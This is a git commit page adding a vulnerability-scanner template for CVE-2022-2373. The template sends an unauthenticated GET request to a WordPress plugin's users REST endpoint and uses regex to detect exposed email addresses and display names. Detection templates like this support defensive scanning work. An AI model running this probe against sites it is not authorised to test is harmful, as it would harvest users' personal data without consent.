Merge pull request #6003 from theamanrawat/CVE-2022-2373

Added template for CVE-2022-2373
patch-1
Ritik Chaddha 2022-11-10 21:12:27 +05:30 committed by GitHub
commit 6260747c9e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
id: CVE-2022-2373
info:
name: Simply Schedule Appointments < 1.5.7.7 - Email Address Disclosure
author: theamanrawat,theabhinavgaur
severity: medium
description: |
The Simply Schedule Appointments WordPress plugin before 1.5.7.7 is missing authorisation in a REST endpoint, allowing unauthenticated users to retrieve WordPress users details such as name and email address.
reference:
- https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31
- https://wordpress.org/plugins/simply-schedule-appointments/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2373
classification:
cve-id: CVE-2022-2373
metadata:
verified: true
tags: cve,cve2022,wordpress,wp-plugin,wp,simply-schedule-appointments,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/ssa/v1/users"
matchers-condition: and
matchers:
- type: regex
regex:
- 'response_code":200'
- '"email":"([a-zA-Z-_0-9@.]+)","display_name":"([a-zA-Z-_0-9@.]+)","gravatar_url":"http?:\\\/\\\/([a-z0-9A-Z.\\\/?=&@_-]+)"'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200